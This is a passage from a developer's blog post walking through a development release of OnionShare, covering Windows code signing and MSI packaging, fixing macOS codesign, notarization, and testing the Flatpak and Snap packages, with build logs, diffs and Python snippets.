<span class="n">signtool</span><span class="p">.</span><span class="n">exe</span> <span class="p">/</span><span class="n">v</span> <span class="p">/</span><span class="n">d</span> <span class="s2">"Calc test"</span> <span class="p">/</span><span class="n">n</span> <span class="s2">"Science and Design Inc."</span> <span class="p">/</span><span class="n">fd</span> <span class="n">sha256</span> <span class="p">/</span><span class="n">td</span> <span class="n">sha256</span> <span class="p">/</span><span class="n">tr</span> <span class="n">http</span><span class="p">://</span><span class="n">timestamp</span><span class="p">.</span><span class="n">digicert</span><span class="p">.</span><span class="n">com</span> <span class="n">calc</span><span class="p">.</span><span class="n">exe</span>
</pre></div>
<p>I copied <code>calc.exe</code> into my home folder and then used <code>signtool.exe</code> to digitally sign it.</p>
<p><img src="signtool-calc.png" alt="Signing calc.exe"></p>
<p>The SafeNet Authentication Client popped up a window asking for my token password. I entered it, and then the secret key on my smart card digitally signed <code>calc.exe</code>. I inspected the digital signature, and it works!</p>
<p><img src="calc-signature.png" alt="Viewing digital signature info for calc.exe"></p>
<h4 id="code-signing-and-packaging">Code signing and packaging</h4><p>The instructions from <code>RELEASE.md</code> say to install the Windows SDK, to install the .NET Framework 3.5 SP1 Runtime, and to install WiX 3.11, which is the software I use to create the Windows MSI package.</p>
<p>It looks like since the last OnionShare release there's been a major update in <a href="https://wixtoolset.org/">WiX</a> and now version 4 is out. Upgrading from WiX 3 to 4 looks like a huge project, so I'm going to skip that for this release and still use the older version of WiX, but it's a good thing to focus on in the future. You can still find information on using WiX 3.11 <a href="https://wixtoolset.org/docs/wix3/">here</a> -- I updated the <code>RELEASE.md</code> docs slightly to reflect this.</p>
<p>So, I went ahead and installed the Windows SDK, installed .NET 3.5, and installed WiX 3.11.</p>
<p>The next step in <code>RELEASE.md</code> is to download the Windows binaries from GitHub Actions, so I downloaded the <code>win64-build</code> artifact from GitHub and extracted it into my Downloads folder. The <code>RELEASE.md</code> instructions say to run these commands:</p>
<div class="hll"><pre><span></span><span class="n">poetry</span> <span class="n">run</span> <span class="n">python</span> <span class="p">.\</span><span class="n">scripts</span><span class="p">\</span><span class="n">build-windows</span><span class="p">.</span><span class="n">py</span> <span class="n">codesign</span> <span class="no">[path]</span>
<span class="n">poetry</span> <span class="n">run</span> <span class="n">python</span> <span class="p">.\</span><span class="n">scripts</span><span class="p">\</span><span class="n">build-windows</span><span class="p">.</span><span class="n">py</span> <span class="n">package</span> <span class="no">[path]</span>
</pre></div>
<p>The first command uses <code>signtool.exe</code> to digitally sign all of the binaries (<code>onionshare.exe</code>, <code>onionshare-cli.exe</code>, <code>obfs4proxy.exe</code>, <code>meek-client.exe</code>, and <code>snowflake-client.exe</code>). The second command uses the WiX toolset to create the MSI.</p>
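<p>Under the hood, the codesign step just loops over the binaries and shells out to <code>signtool.exe</code> for each one. Here's a rough sketch of that pattern — a hypothetical helper, not the actual <code>build-windows.py</code> code, though the signtool path, certificate name, and flags mirror the ones that appear in this post:</p>

```python
import os
import subprocess

# Assumptions: signtool path and certificate name as they appear in this post.
SIGNTOOL = r"C:\Program Files (x86)\Windows Kits\10\bin\10.0.22621.0\x64\signtool.exe"
CERT_NAME = "Science and Design Inc."
TIMESTAMP_URL = "http://timestamp.digicert.com"


def signtool_cmd(binary_path):
    """Build the signtool invocation for a single binary."""
    return [
        SIGNTOOL, "sign", "/v",
        "/d", "OnionShare",       # description shown in the signature
        "/n", CERT_NAME,          # select the certificate by subject name
        "/fd", "sha256",          # file digest algorithm
        "/td", "sha256",          # timestamp digest algorithm
        "/tr", TIMESTAMP_URL,     # RFC 3161 timestamp server
        binary_path,
    ]


def sign_binaries(build_dir, names):
    """Sign each named binary in the build directory, one signtool run each."""
    for name in names:
        subprocess.run(signtool_cmd(os.path.join(build_dir, name)), check=True)
```

<p>Each <code>subprocess.run()</code> call triggers a separate SafeNet token password prompt, which is why I get prompted once per binary.</p>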
<p>Before running the codesign command though, I updated the <code>sign()</code> function in <code>build-windows.py</code> so that it will use the new Science & Design certificate, instead of the old one (which was from a CA called Certum, under the name "Open Source Developer, Micah Lee").</p>
<p>Then I ran:</p>
<div class="hll"><pre><span></span><span class="n">poetry</span> <span class="n">run</span> <span class="n">python</span> <span class="p">.\</span><span class="n">scripts</span><span class="p">\</span><span class="n">build-windows</span><span class="p">.</span><span class="n">py</span> <span class="n">codesign</span> <span class="n">C</span><span class="p">:\</span><span class="n">Users</span><span class="p">\</span><span class="n">dev</span><span class="p">\</span><span class="n">Downloads</span><span class="p">\</span><span class="n">onionshare-win64</span><span class="p">\</span>
</pre></div>
<p>And it worked! It prompted me for the token password for each binary it signed, and one by one it signed them all. Then I ran the <code>build-windows.py package</code> command:</p>
<pre><code>PS C:\Users\dev\code\onionshare\desktop> poetry run python .\scripts\build-windows.py package C:\Users\dev\Downloads\onionshare-win64\
> Build the WiX file
> Build the MSI
['C:\\Program Files (x86)\\WiX Toolset v3.11\\bin\\candle.exe', 'OnionShare.wxs']
Windows Installer XML Toolset Compiler version 3.11.2.4516
Copyright (c) .NET Foundation and contributors. All rights reserved.
OnionShare.wxs
['C:\\Program Files (x86)\\WiX Toolset v3.11\\bin\\light.exe', '-ext', 'WixUIExtension', 'OnionShare.wixobj']
Windows Installer XML Toolset Linker version 3.11.2.4516
Copyright (c) .NET Foundation and contributors. All rights reserved.
C:\Users\dev\Downloads\onionshare-win64\OnionShare.wxs(16) : warning LGHT1076 : ICE61: This product should remove only older versions of itself. The Maximum version is not less than the current product. (2.6.1 2.6.1)
> Prepare OnionShare.msi for signing
['C:\\Program Files (x86)\\WiX Toolset v3.11\\bin\\insignia.exe', '-im', 'C:\\Users\\dev\\Downloads\\onionshare-win64\\OnionShare.msi']
Windows Installer XML Toolset Inscriber version 3.11.2.4516
Copyright (c) .NET Foundation and contributors. All rights reserved.
> Signing C:\Users\dev\Downloads\onionshare-win64\OnionShare.msi
['C:\\Program Files (x86)\\Windows Kits\\10\\bin\\10.0.22621.0\\\\x64\\signtool.exe', 'sign', '/v', '/d', 'OnionShare', '/n', 'Science and Design Inc.', '/fd', 'sha256', '/td', 'sha256', '/tr', 'http://timestamp.digicert.com', 'C:\\Users\\dev\\Downloads\\onionshare-win64\\OnionShare.msi']
The following certificate was selected:
Issued to: Science and Design Inc.
Issued by: HARICA Code Signing RSA
Expires: Thu Jul 17 23:30:04 2025
SHA1 hash: 0BD01CB561295C13EC72FF5ED7BB1AF65C70B723
Done Adding Additional Store
Successfully signed: C:\Users\dev\Downloads\onionshare-win64\OnionShare.msi
Number of files successfully Signed: 1
Number of warnings: 0
Number of errors: 0
> Final MSI: C:\Users\dev\code\onionshare\desktop\dist\OnionShare-win64-2.6.1.dev1.msi
</code></pre>
<p>This worked too. The final step code signed the MSI, and I was prompted for my token password. Now I have the final installer package, <code>OnionShare-win64-2.6.1.dev1.msi</code>. When I double-click it, it opens the installer.</p>
<p><img src="windows-installer.png" alt="OnionShare Windows installer"></p>
<p>And User Access Control asks if I want to install OnionShare, listing Science and Design Inc. as the verified publisher.</p>
<p><img src="windows-uac.png" alt="OnionShare UAC"></p>
<p>The install finishes successfully! Ahh, but there's a problem. It installed it in <code>C:\Program Files (x86)\OnionShare</code>, but that's where 32-bit Windows software is supposed to go. When we upgraded to PySide 6 we decided to stop releasing 32-bit Windows versions, since PySide 6 doesn't support it. The install should be putting OnionShare in <code>C:\Program Files</code>, not <code>C:\Program Files (x86)</code>.</p>
<p>I uninstalled OnionShare and then went to work updating <code>build-windows.py</code> to support installing in <code>Program Files</code> instead. I won't bore you with the debugging details, but basically, this patch did it:</p>
<div class="hll"><pre><span></span><span class="gh">diff --git a/desktop/scripts/build-windows.py b/desktop/scripts/build-windows.py</span>
<span class="gh">index 224af59b..9579b81d 100644</span>
<span class="gd">--- a/desktop/scripts/build-windows.py</span>
<span class="gi">+++ b/desktop/scripts/build-windows.py</span>
<span class="gu">@@ -117,6 +117,7 @@ def wix_build_dir_xml(root, data):</span>
<span class="w"> </span> "Component",
<span class="w"> </span> Id="ApplicationShortcuts",
<span class="w"> </span> Guid="539e7de8-a124-4c09-aa55-0dd516aad7bc",
<span class="gi">+ Win64="yes",</span>
<span class="w"> </span> )
<span class="w"> </span> ET.SubElement(
<span class="w"> </span> component_el,
<span class="gu">@@ -152,6 +153,7 @@ def wix_build_components_xml(root, data):</span>
<span class="w"> </span> "Component",
<span class="w"> </span> Id=subdata["component_id"],
<span class="w"> </span> Guid=subdata["component_guid"],
<span class="gi">+ Win64="yes",</span>
<span class="w"> </span> )
<span class="w"> </span> for filename in subdata["files"]:
<span class="w"> </span> file_el = ET.SubElement(
<span class="gu">@@ -180,7 +182,7 @@ def msi_package(build_path, msi_path, product_update_code):</span>
<span class="w"> </span> "name": "SourceDir",
<span class="w"> </span> "dirs": [
<span class="w"> </span> {
<span class="gd">- "id": "ProgramFilesFolder",</span>
<span class="gi">+ "id": "ProgramFiles64Folder",</span>
<span class="w"> </span> "dirs": [],
<span class="w"> </span> },
<span class="w"> </span> {
<span class="gu">@@ -218,10 +220,11 @@ def msi_package(build_path, msi_path, product_update_code):</span>
<span class="w"> </span> Keywords="Installer",
<span class="w"> </span> Description="OnionShare $(var.ProductVersion) Installer",
<span class="w"> </span> Manufacturer="Micah Lee, et al.",
<span class="gd">- InstallerVersion="100",</span>
<span class="gi">+ InstallerVersion="200",</span>
<span class="w"> </span> Languages="1033",
<span class="w"> </span> Compressed="yes",
<span class="w"> </span> SummaryCodepage="1252",
<span class="gi">+ Platform="x64",</span>
<span class="w"> </span> )
<span class="w"> </span> ET.SubElement(product_el, "Media", Id="1", Cabinet="product.cab", EmbedCab="yes")
<span class="w"> </span> ET.SubElement(
</pre></div>
<p>I re-ran the <code>build-windows.py package</code> command and it created a new signed MSI installer. I installed this one, and I confirmed that it successfully installed in <code>C:\Program Files\OnionShare</code>. I then ran OnionShare from the Start menu:</p>
<p><img src="windows-installed.png" alt="Running the final signed and installed OnionShare in Windows"></p>
<p>Nice! The Windows development release is done.</p>
<h3 id="macos-release">macOS release</h3><p>Time to do the macOS release. First, I'll start with manually building the Apple Silicon app bundle.</p>
<h4 id="building-the-apple-silicon-app-bundle">Building the Apple Silicon app bundle</h4><p>Back on my Apple Silicon Mac computer, I booted up my macOS development VM. I opened a terminal, changed to the <code>onionshare</code> folder, verified the PGP signature on <code>v2.6.1.dev1</code> tag, and checked it out:</p>
<div class="hll"><pre><span></span>git<span class="w"> </span>fetch
git<span class="w"> </span>tag<span class="w"> </span>-v<span class="w"> </span>v2.6.1.dev1
git<span class="w"> </span>checkout<span class="w"> </span>v2.6.1.dev1
</pre></div>
<p>Following the instructions in <code>RELEASE.md</code>, I made sure all of the dependencies are installed and compiled:</p>
<div class="hll"><pre><span></span><span class="nb">cd</span><span class="w"> </span>desktop
python3<span class="w"> </span>-m<span class="w"> </span>pip<span class="w"> </span>install<span class="w"> </span>poetry
poetry<span class="w"> </span>install
poetry<span class="w"> </span>run<span class="w"> </span>python<span class="w"> </span>./scripts/get-tor.py<span class="w"> </span>macos
./scripts/build-pt-obfs4proxy.sh
./scripts/build-pt-snowflake.sh
./scripts/build-pt-meek.sh
</pre></div>
<p>After re-installing Poetry deps, I also patched cx_Freeze in the Poetry virtual environment to include the changes I made in <a href="https://github.com/marcelotduarte/cx_Freeze/pull/2102">my PR</a> (which I just noticed has been merged!).</p>
<p>Then I followed the instructions to create the Apple Silicon app bundle:</p>
<div class="hll"><pre><span></span>poetry<span class="w"> </span>run<span class="w"> </span>python<span class="w"> </span>./setup-freeze.py<span class="w"> </span>bdist_mac
rm<span class="w"> </span>-rf<span class="w"> </span>build/OnionShare.app/Contents/Resources/lib
mv<span class="w"> </span>build/exe.macosx-10.9-universal2-3.11/lib<span class="w"> </span>build/OnionShare.app/Contents/Resources/
poetry<span class="w"> </span>run<span class="w"> </span>python<span class="w"> </span>./scripts/build-macos.py<span class="w"> </span>cleanup-build
</pre></div>
<p>And I ended up with an Apple Silicon <code>OnionShare.app</code> app bundle. I opened Finder, found my newly created app bundle, and right-clicked on it to compress it. I then transferred <code>OnionShare.app.zip</code> out of my VM and onto my older Intel Mac that has my Apple Developer signing keys on it, which I'm using as a dedicated build machine.</p>
<h4 id="creating-the-universal2-app-bundle">Creating the universal2 app bundle</h4><p>I manually made the Apple Silicon app bundle, but my GitHub Actions workflow made the Intel one for me. I downloaded the <code>mac-intel-build</code> artifact from GitHub and copied that to my dedicated build machine too.</p>
<p>On my build computer, I created a folder in my desktop called <code>v2.6.1.dev1</code> with the following structure:</p>
<pre><code>Desktop/
└── v2.6.1.dev1/
├── intel/
│ └── OnionShare.app
└── silicon/
└── OnionShare.app
</code></pre>
<p>Then I merged the ARM64 and Intel app bundles into a single universal2 bundle:</p>
<div class="hll"><pre><span></span>poetry<span class="w"> </span>run<span class="w"> </span>./scripts/macos-merge-universal.py<span class="w"> </span>~/Desktop/v2.6.1.dev1/intel<span class="w"> </span>~/Desktop/v2.6.1.dev1/silicon<span class="w"> </span>~/Desktop/v2.6.1.dev1/universal2
</pre></div>
<p>I then code signed it using my Apple Developer signing keys:</p>
<pre><code>% poetry run python ./scripts/build-macos.py codesign ~/Desktop/v2.6.1.dev1/universal2/OnionShare.app
['codesign', '--sign', 'Developer ID Application: Micah Lee (N9B95FDWH4)', '--entitlements', '/Users/user/code/onionshare/desktop/package/Entitlements.plist', '--timestamp', '--deep', '--force', '--options', 'runtime,library', '/Users/user/Desktop/v2.6.1.dev1/universal2/OnionShare.app/Contents/Resources/lib/_sqlite3.cpython-311-darwin.so'] # cwd=None
/Users/user/Desktop/v2.6.1.dev1/universal2/OnionShare.app/Contents/Resources/lib/_sqlite3.cpython-311-darwin.so: replacing existing signature
['codesign', '--sign', 'Developer ID Application: Micah Lee (N9B95FDWH4)', '--entitlements', '/Users/user/code/onionshare/desktop/package/Entitlements.plist', '--timestamp', '--deep', '--force', '--options', 'runtime,library', '/Users/user/Desktop/v2.6.1.dev1/universal2/OnionShare.app/Contents/Resources/lib/_scproxy.cpython-311-darwin.so'] # cwd=None
--snip--
/Users/user/Desktop/v2.6.1.dev1/universal2/OnionShare.app/Contents/Frameworks/QtCore.framework/Versions/A/QtCore: No such file or directory
Traceback (most recent call last):
File "/Users/user/code/onionshare/desktop/./scripts/build-macos.py", line 303, in <module>
main()
--snip--
subprocess.CalledProcessError: Command '['codesign', '--sign', 'Developer ID Application: Micah Lee (N9B95FDWH4)', '--entitlements', '/Users/user/code/onionshare/desktop/package/Entitlements.plist', '--timestamp', '--deep', '--force', '--options', 'runtime,library', '/Users/user/Desktop/v2.6.1.dev1/universal2/OnionShare.app/Contents/Frameworks/QtCore.framework/Versions/A/QtCore']' returned non-zero exit status 1.
</code></pre>
<p>Oops. It looks like it's trying to sign <code>OnionShare.app/Contents/Frameworks/QtCore.framework/Versions/A/QtCore</code>, but that file doesn't exist.</p>
<h4 id="fixing-macos-code-signing">Fixing macOS code signing</h4><p>Let's pull up the code...</p>
<div class="hll"><pre><span></span><span class="nd">@main</span><span class="o">.</span><span class="n">command</span><span class="p">()</span>
<span class="nd">@click</span><span class="o">.</span><span class="n">argument</span><span class="p">(</span><span class="s2">"app_path"</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">codesign</span><span class="p">(</span><span class="n">app_path</span><span class="p">):</span>
<span class="w"> </span><span class="sd">"""Sign macOS binaries before packaging"""</span>
<span class="k">for</span> <span class="n">path</span> <span class="ow">in</span> <span class="n">itertools</span><span class="o">.</span><span class="n">chain</span><span class="p">(</span>
<span class="n">glob</span><span class="o">.</span><span class="n">glob</span><span class="p">(</span><span class="sa">f</span><span class="s2">"</span><span class="si">{</span><span class="n">app_path</span><span class="si">}</span><span class="s2">/Contents/Resources/lib/**/*.so"</span><span class="p">,</span> <span class="n">recursive</span><span class="o">=</span><span class="kc">True</span><span class="p">),</span>
<span class="n">glob</span><span class="o">.</span><span class="n">glob</span><span class="p">(</span><span class="sa">f</span><span class="s2">"</span><span class="si">{</span><span class="n">app_path</span><span class="si">}</span><span class="s2">/Contents/Resources/lib/**/*.dylib"</span><span class="p">,</span> <span class="n">recursive</span><span class="o">=</span><span class="kc">True</span><span class="p">),</span>
<span class="p">[</span>
<span class="sa">f</span><span class="s2">"</span><span class="si">{</span><span class="n">app_path</span><span class="si">}</span><span class="s2">/Contents/Frameworks/QtCore.framework/Versions/A/QtCore"</span><span class="p">,</span>
<span class="sa">f</span><span class="s2">"</span><span class="si">{</span><span class="n">app_path</span><span class="si">}</span><span class="s2">/Contents/Frameworks/QtDBus.framework/Versions/A/QtDBus"</span><span class="p">,</span>
<span class="sa">f</span><span class="s2">"</span><span class="si">{</span><span class="n">app_path</span><span class="si">}</span><span class="s2">/Contents/Frameworks/QtGui.framework/Versions/A/QtGui"</span><span class="p">,</span>
<span class="sa">f</span><span class="s2">"</span><span class="si">{</span><span class="n">app_path</span><span class="si">}</span><span class="s2">/Contents/Frameworks/QtWidgets.framework/Versions/A/QtWidgets"</span><span class="p">,</span>
<span class="sa">f</span><span class="s2">"</span><span class="si">{</span><span class="n">app_path</span><span class="si">}</span><span class="s2">/Contents/Resources/lib/Python"</span><span class="p">,</span>
<span class="sa">f</span><span class="s2">"</span><span class="si">{</span><span class="n">app_path</span><span class="si">}</span><span class="s2">/Contents/Resources/lib/onionshare/resources/tor/meek-client"</span><span class="p">,</span>
<span class="sa">f</span><span class="s2">"</span><span class="si">{</span><span class="n">app_path</span><span class="si">}</span><span class="s2">/Contents/Resources/lib/onionshare/resources/tor/obfs4proxy"</span><span class="p">,</span>
<span class="sa">f</span><span class="s2">"</span><span class="si">{</span><span class="n">app_path</span><span class="si">}</span><span class="s2">/Contents/Resources/lib/onionshare/resources/tor/snowflake-client"</span><span class="p">,</span>
<span class="sa">f</span><span class="s2">"</span><span class="si">{</span><span class="n">app_path</span><span class="si">}</span><span class="s2">/Contents/Resources/lib/onionshare/resources/tor/tor"</span><span class="p">,</span>
<span class="sa">f</span><span class="s2">"</span><span class="si">{</span><span class="n">app_path</span><span class="si">}</span><span class="s2">/Contents/Resources/lib/onionshare/resources/tor/libevent-2.1.7.dylib"</span><span class="p">,</span>
<span class="sa">f</span><span class="s2">"</span><span class="si">{</span><span class="n">app_path</span><span class="si">}</span><span class="s2">/Contents/MacOS/onionshare"</span><span class="p">,</span>
<span class="sa">f</span><span class="s2">"</span><span class="si">{</span><span class="n">app_path</span><span class="si">}</span><span class="s2">/Contents/MacOS/onionshare-cli"</span><span class="p">,</span>
<span class="sa">f</span><span class="s2">"</span><span class="si">{</span><span class="n">app_path</span><span class="si">}</span><span class="s2">"</span><span class="p">,</span>
<span class="p">],</span>
<span class="p">):</span>
<span class="n">sign</span><span class="p">(</span><span class="n">path</span><span class="p">,</span> <span class="n">entitlements_plist_path</span><span class="p">,</span> <span class="n">identity_name_application</span><span class="p">)</span>
<span class="nb">print</span><span class="p">(</span><span class="sa">f</span><span class="s2">"> Signed app bundle: </span><span class="si">{</span><span class="n">app_path</span><span class="si">}</span><span class="s2">"</span><span class="p">)</span>
</pre></div>
<p>This code signs all of the <code>.so</code> files in the app bundle, then all of the <code>.dylib</code> files, then a hardcoded list of individual Mach-O binaries, and finally the app bundle itself. I forget exactly why this was necessary, other than that just signing the app bundle alone would miss some of the binaries.</p>
<p>The problem is that with the new versions of PySide6 and cx_Freeze, these files have all moved around. Hmm, maybe I can solve this problem by writing code that just searches for all Mach-O binaries and signs them, so it will keep working no matter how the file structure changes in the future. In fact, I already wrote a function that finds these binaries in <code>macos-merge-universal.py</code>: the <code>get_binary_arches()</code> function.</p>
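<p>For reference, here's a simplified sketch of what a <code>get_binary_arches()</code>-style scanner could look like — the real function in the OnionShare repo may differ. It walks the bundle and shells out to <code>lipo -archs</code>, so it only works on macOS with the Xcode command line tools installed:</p>

```python
import os
import subprocess


def get_archs(path):
    """Return the set of architectures in a Mach-O file, or None if not Mach-O."""
    result = subprocess.run(["lipo", "-archs", path], capture_output=True, text=True)
    if result.returncode != 0:
        return None  # lipo rejects non-Mach-O files
    return set(result.stdout.split())


def classify(archs):
    """Bucket a set of architectures into universal / silicon / intel."""
    if {"x86_64", "arm64"} <= archs:
        return "universal"
    if "arm64" in archs:
        return "silicon"
    return "intel"


def scan_bundle(app_path):
    """Walk an .app bundle and classify every Mach-O binary inside it."""
    universal, silicon, intel = [], [], []
    buckets = {"universal": universal, "silicon": silicon, "intel": intel}
    for root, _dirs, files in os.walk(app_path):
        for name in files:
            path = os.path.join(root, name)
            if os.path.islink(path):
                continue  # skip framework version symlinks
            archs = get_archs(path)
            if archs:
                buckets[classify(archs)].append(path)
    return universal, silicon, intel
```

<p>The nice property of this approach is that the signing code no longer hardcodes any paths: whatever cx_Freeze and PySide6 do to the bundle layout, every Mach-O file still gets found and signed.</p>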
<p>In <code>desktop/scripts</code>, I made a new file called <code>common.py</code> and moved the <code>get_binary_arches()</code> function into it. I deleted the function from <code>macos-merge-universal.py</code>, and instead just imported it at the top:</p>
<div class="hll"><pre><span></span><span class="kn">from</span> <span class="nn">common</span> <span class="kn">import</span> <span class="n">get_binary_arches</span>
</pre></div>
<p>I also imported <code>get_binary_arches</code> in <code>build-macos.py</code>, and I updated the <code>codesign()</code> function to just be this:</p>
<div class="hll"><pre><span></span><span class="nd">@main</span><span class="o">.</span><span class="n">command</span><span class="p">()</span>
<span class="nd">@click</span><span class="o">.</span><span class="n">argument</span><span class="p">(</span><span class="s2">"app_path"</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">codesign</span><span class="p">(</span><span class="n">app_path</span><span class="p">):</span>
<span class="w">    </span><span class="sd">"""Sign macOS binaries before packaging"""</span>
<span class="w">    </span><span class="n">bin_universal</span><span class="p">,</span> <span class="n">bin_silicon</span><span class="p">,</span> <span class="n">bin_intel</span> <span class="o">=</span> <span class="n">get_binary_arches</span><span class="p">(</span><span class="n">app_path</span><span class="p">)</span>
<span class="w">    </span><span class="n">binaries</span> <span class="o">=</span> <span class="n">bin_universal</span> <span class="o">+</span> <span class="n">bin_silicon</span> <span class="o">+</span> <span class="n">bin_intel</span> <span class="o">+</span> <span class="p">[</span><span class="n">app_path</span><span class="p">]</span>
<span class="w">    </span><span class="k">for</span> <span class="n">filename</span> <span class="ow">in</span> <span class="n">binaries</span><span class="p">:</span>
<span class="w">        </span><span class="n">sign</span><span class="p">(</span><span class="n">filename</span><span class="p">,</span> <span class="n">entitlements_plist_path</span><span class="p">,</span> <span class="n">identity_name_application</span><span class="p">)</span>
<span class="w">    </span><span class="nb">print</span><span class="p">(</span><span class="sa">f</span><span class="s2">"> Signed app bundle: </span><span class="si">{</span><span class="n">app_path</span><span class="si">}</span><span class="s2">"</span><span class="p">)</span>
</pre></div>
<p>This now individually signs every binary, and then signs the app bundle itself. Let's see if it works:</p>
<pre><code>% poetry run python ./scripts/build-macos.py codesign ~/Desktop/v2.6.1.dev1/universal2/OnionShare.app
['codesign', '--sign', 'Developer ID Application: Micah Lee (N9B95FDWH4)', '--entitlements', '/Users/user/code/onionshare/desktop/package/Entitlements.plist', '--timestamp', '--deep', '--force', '--options', 'runtime,library', '/Users/user/Desktop/v2.6.1.dev1/universal2/OnionShare.app/Contents/MacOS/onionshare'] # cwd=None
/Users/user/Desktop/v2.6.1.dev1/universal2/OnionShare.app/Contents/MacOS/onionshare: replacing existing signature
--snip--
['codesign', '--sign', 'Developer ID Application: Micah Lee (N9B95FDWH4)', '--entitlements', '/Users/user/code/onionshare/desktop/package/Entitlements.plist', '--timestamp', '--deep', '--force', '--options', 'runtime,library', '/Users/user/Desktop/v2.6.1.dev1/universal2/OnionShare.app'] # cwd=None
/Users/user/Desktop/v2.6.1.dev1/universal2/OnionShare.app: replacing existing signature
> Signed app bundle: /Users/user/Desktop/v2.6.1.dev1/universal2/OnionShare.app
</code></pre>
<p>I now have a code-signed app bundle.</p>
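<p>For reference, the <code>codesign</code> invocation visible in the build log above maps onto a small helper. This is a sketch of what a <code>sign()</code> function matching that log might look like, not the actual code from OnionShare's build scripts; <code>build_codesign_cmd()</code> is a hypothetical name:</p>

```python
import subprocess


def build_codesign_cmd(path, entitlements_path, identity):
    """Assemble the codesign command seen in the build log: hardened
    runtime, deep signing, and a secure timestamp."""
    return [
        "codesign",
        "--sign", identity,
        "--entitlements", entitlements_path,
        "--timestamp",        # request a secure timestamp from Apple
        "--deep", "--force",  # re-sign nested code, replacing existing signatures
        "--options", "runtime,library",
        path,
    ]


def sign(path, entitlements_path, identity):
    """Sign a single file, raising CalledProcessError if codesign fails."""
    subprocess.run(build_codesign_cmd(path, entitlements_path, identity), check=True)
```

<p>Keeping the command construction separate from the subprocess call makes it easy to print each command before running it, which is exactly what the log output above shows.</p>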
<h4 id="packaging-the-app">Packaging the app</h4><p>Now that I have a code-signed universal2 binary, I need to package it into a DMG for distribution--one of those things that you can open and then drag an app into Applications. OnionShare uses <a href="https://github.com/create-dmg/create-dmg">create-dmg</a> to make this simple.</p>
<pre><code>% poetry run python ./scripts/build-macos.py package ~/Desktop/v2.6.1.dev1/universal2/OnionShare.app
> Create DMG
--snip--
Disk image done
> Finished building DMG: /Users/user/code/onionshare/desktop/dist/OnionShare-2.6.1.dev1.dmg
</code></pre>
<p>I have <code>OnionShare-2.6.1.dev1.dmg</code>. The final step is to notarize it.</p>
<h4 id="notarizing-the-app">Notarizing the app</h4><p>For the last few years, Apple has been requiring all apps to get notarized. This means developers need to upload their app to Apple's notarization service which thoroughly scans it and makes sure it complies with Apple's security policies (for example, requiring that everything is code signed).</p>
<p>If it fails Apple's notarization, you get a report that explains what's wrong with it, and Mac users can't run your app. If it passes, you get a notarization "ticket". When someone tries running the app, macOS queries Apple's notarization service to see if there's a valid ticket, and if there is, it lets the app proceed. To avoid having macOS query Apple's service every time, you can "staple" the ticket to the app, so that macOS already knows it has passed notarization.</p>
<p>So, following the instructions in <code>RELEASE.md</code>, I uploaded the DMG to Apple's notarization service:</p>
<div class="hll"><pre><span></span>xcrun<span class="w"> </span>altool<span class="w"> </span>--notarize-app<span class="w"> </span>--primary-bundle-id<span class="w"> </span><span class="s2">"com.micahflee.onionshare"</span><span class="w"> </span>-u<span class="w"> </span><span class="s2">"micah@micahflee.com"</span><span class="w"> </span>-p<span class="w"> </span><span class="s2">"</span><span class="nv">$APPLE_PASSWORD</span><span class="s2">"</span><span class="w"> </span>--file<span class="w"> </span>dist/OnionShare-<span class="nv">$VERSION</span>.dmg
</pre></div>
<p>In this case, <code>$APPLE_PASSWORD</code> is an app-specific password for my Apple ID account, and <code>$VERSION</code> is <code>2.6.1.dev1</code>. This command took a few minutes to run because it had to upload the 209MB DMG to Apple's service. Now that it's done uploading, we wait.</p>
<p><img src="apple-notarization-email.png" alt="Email from Apple's notarization service"></p>
<p>It passed notarization! Now I just need to staple the ticket.</p>
<pre><code>% xcrun stapler staple dist/OnionShare-$VERSION.dmg
Processing: /Users/user/code/onionshare/desktop/dist/OnionShare-2.6.1.dev1.dmg
Processing: /Users/user/code/onionshare/desktop/dist/OnionShare-2.6.1.dev1.dmg
The staple and validate action worked!
</code></pre>
<h4 id="testing-it-out">Testing it out</h4><p>On my old Intel Mac, I double-clicked on <code>OnionShare-2.6.1.dev1.dmg</code> and dragged OnionShare into Applications. I then went to Applications and double-clicked on OnionShare, and the OnionShare window opened. I clicked around, and everything seems to work!</p>
<p>I copied the DMG to my Apple Silicon Mac and did the same: I opened the DMG, dragged the app into Applications, and then ran it, and it worked there too!</p>
<p>The macOS development release is done.</p>
<h3 id="testing-flatpak">Testing Flatpak</h3><p>When making a real release, I publish the Flatpak package to Flathub and I publish the Snapcraft package to snapcraft.io, the central repository. But I also distribute signed <code>.flatpak</code> and <code>.snap</code> files for people to download and install if they prefer. Both of these files are generated by the GitHub Actions workflow.</p>
<p>On my Ubuntu computer, I found the GitHub Actions workflow and downloaded <code>flatpak-build.zip</code>. I unzipped it and found <code>OnionShare.flatpak</code>. I installed it by running:</p>
<div class="hll"><pre><span></span>flatpak<span class="w"> </span>install<span class="w"> </span>./OnionShare.flatpak
</pre></div>
<p>Installing it still required downloading many dependencies from Flathub. Once it was installed, I ran it with:</p>
<div class="hll"><pre><span></span>flatpak<span class="w"> </span>run<span class="w"> </span>org.onionshare.OnionShare
</pre></div>
<p>The OnionShare window opened and everything seems to work.</p>
<h3 id="testing-snapcraft">Testing Snapcraft</h3><p>I found the GitHub Actions workflow and downloaded <code>snapcraft-build.zip</code>. I unzipped it and found <code>onionshare_2.6.1.dev1_amd64.snap</code>. I installed it by running:</p>
<div class="hll"><pre><span></span>sudo<span class="w"> </span>snap<span class="w"> </span>install<span class="w"> </span>--devmode<span class="w"> </span>./onionshare_2.6.1.dev1_amd64.snap
</pre></div>
<p>Once it was installed, I ran it with:</p>
<div class="hll"><pre><span></span>/snap/bin/onionshare
</pre></div>
<p>The OnionShare window opened and everything seems to work.</p>
<h2 id="onionshare-v2-6-1-dev1-released">OnionShare v2.6.1.dev1 released</h2><p>And with that, I've made a development release! You can find the MSI Windows installer, the DMG macOS installer, and the Flatpak and Snapcraft packages, here: <a href="https://github.com/onionshare/onionshare/releases/tag/v2.6.1.dev1">https://github.com/onionshare/onionshare/releases/tag/v2.6.1.dev1</a></p>
<p>If you're curious, go ahead and test them out, and submit any bugs you find by <a href="https://web.archive.org/web/20231028233436/https://github.com/onionshare/onionshare/issues/new">opening GitHub issues</a>.</p>
<p>Whew, this has been a ridiculous process, but I'm glad it's nearly done! I expect part 4 will be the final part in this epic saga, and also hopefully it will be <em>much</em> shorter, because all I'll need to do in it is make the final release (unless typing those words already jinxed it).</p>
